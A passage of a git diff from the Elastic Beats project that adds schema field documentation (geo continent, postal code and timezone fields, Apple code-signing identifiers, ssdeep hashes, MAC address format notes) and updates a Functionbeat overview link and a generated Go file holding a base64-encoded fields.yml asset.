-4025,7 +4368,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4089,7 +4432,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4108,6 +4451,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4165,6 +4519,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4187,6 +4553,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4199,7 +4576,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4263,7 +4640,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4283,10 +4660,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -4856,6 +5236,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -4879,6 +5271,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5001,6 +5405,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -5055,6 +5468,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5078,6 +5503,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5200,6 +5637,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -5938,6 +6384,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -5995,6 +6452,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6017,6 +6486,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -6030,9 +6510,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6400,6 +6883,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -6457,6 +6951,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6479,6 +6985,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6492,9 +7009,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/x-pack/functionbeat/docs/overview.asciidoc b/x-pack/functionbeat/docs/overview.asciidoc index 685a9910253..132028d3b36 100644 --- a/x-pack/functionbeat/docs/overview.asciidoc +++ b/x-pack/functionbeat/docs/overview.asciidoc @@ -2,7 +2,7 @@ [role="xpack"] == {beatname_uc} overview -{beatname_uc} is an Elastic https://www.elastic.co/products/beats[Beat] that you +{beatname_uc} is an Elastic https://www.elastic.co/beats[Beat] that you deploy as a function in your serverless environment to collect data from cloud services and ship it to the {stack}. diff --git a/x-pack/functionbeat/include/fields.go b/x-pack/functionbeat/include/fields.go index ede9ab3220d..095643ff7f0 100644 --- a/x-pack/functionbeat/include/fields.go +++ b/x-pack/functionbeat/include/fields.go @@ -19,5 +19,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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